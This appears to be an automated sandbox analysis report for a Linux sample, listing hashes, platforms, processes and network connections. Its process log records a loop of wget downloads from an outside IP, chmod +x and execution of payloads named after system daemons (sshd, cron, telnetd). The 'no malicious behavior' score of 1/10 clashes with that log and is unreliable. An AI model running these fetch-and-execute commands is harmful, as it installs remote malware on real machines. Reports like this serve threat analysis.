Malware Analysis Report

2024-11-13 13:22

Sample ID 240616-3s228sthjf
Target b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
SHA256 e8870d855c6592d00913d785affd6b7bd0496643450668d83b40d149c42d1239
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

e8870d855c6592d00913d785affd6b7bd0496643450668d83b40d149c42d1239

Threat Level: No (potentially) malicious behavior was detected

The file b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-16 23:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 23:47

Reported

2024-06-16 23:49

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

129s

Command Line

[/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118]

Signatures

N/A

Processes

/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118

[/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118]

/usr/bin/wget

[wget http://145.239.72.250/ntpd]

/bin/chmod

[chmod +x ntpd]

/tmp/ntpd

[./ntpd]

/bin/rm

[rm -rf ntpd]

/usr/bin/wget

[wget http://145.239.72.250/sshd]

/bin/chmod

[chmod +x sshd]

/tmp/sshd

[./sshd]

/bin/rm

[rm -rf sshd]

/usr/bin/wget

[wget http://145.239.72.250/openssh]

/bin/chmod

[chmod +x openssh]

/tmp/openssh

[./openssh]

/bin/rm

[rm -rf openssh]

/usr/bin/wget

[wget http://145.239.72.250/bash]

/bin/chmod

[chmod +x bash]

/tmp/bash

[./bash]

/bin/rm

[rm -rf bash]

/usr/bin/wget

[wget http://145.239.72.250/tftp]

/bin/chmod

[chmod +x tftp]

/tmp/tftp

[./tftp]

/bin/rm

[rm -rf tftp]

/usr/bin/wget

[wget http://145.239.72.250/wget]

/bin/chmod

[chmod +x wget]

/tmp/wget

[./wget]

/bin/rm

[rm -rf wget]

/usr/bin/wget

[wget http://145.239.72.250/cron]

/bin/chmod

[chmod +x cron]

/tmp/cron

[./cron]

/bin/rm

[rm -rf cron]

/usr/bin/wget

[wget http://145.239.72.250/ftp]

/bin/chmod

[chmod +x ftp]

/tmp/ftp

[./ftp]

/bin/rm

[rm -rf ftp]

/usr/bin/wget

[wget http://145.239.72.250/pftp]

/bin/chmod

[chmod +x pftp]

/tmp/pftp

[./pftp]

/bin/rm

[rm -rf pftp]

/usr/bin/wget

[wget http://145.239.72.250/sh]

/bin/chmod

[chmod +x sh]

/tmp/sh

[./sh]

/bin/rm

[rm -rf sh]

/usr/bin/wget

[wget http://145.239.72.250/ ]

/bin/chmod

[chmod +x ]

/tmp/

[./ ]

/bin/rm

[rm -rf ]

/usr/bin/wget

[wget http://145.239.72.250/apache2]

/bin/chmod

[chmod +x apache2]

/tmp/apache2

[./apache2]

/bin/rm

[rm -rf apache2]

/usr/bin/wget

[wget http://145.239.72.250/telnetd]

/bin/chmod

[chmod +x telnetd]

/tmp/telnetd

[./telnetd]

/bin/rm

[rm -rf telnetd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
FR 145.239.72.250:80 145.239.72.250 tcp
US 1.1.1.1:53 henosis.fr udp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 151.101.65.91:443 tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.65.91:443 tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
GB 89.187.167.3:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 195.181.164.20:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-16 23:47

Reported

2024-06-16 23:50

Platform

debian9-armhf-20240611-en

Max time network

38s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
FR 145.239.72.250:80 145.239.72.250 tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-16 23:47

Reported

2024-06-16 23:47

Platform

debian9-mipsbe-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-16 23:47

Reported

2024-06-16 23:47

Platform

debian9-mipsel-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A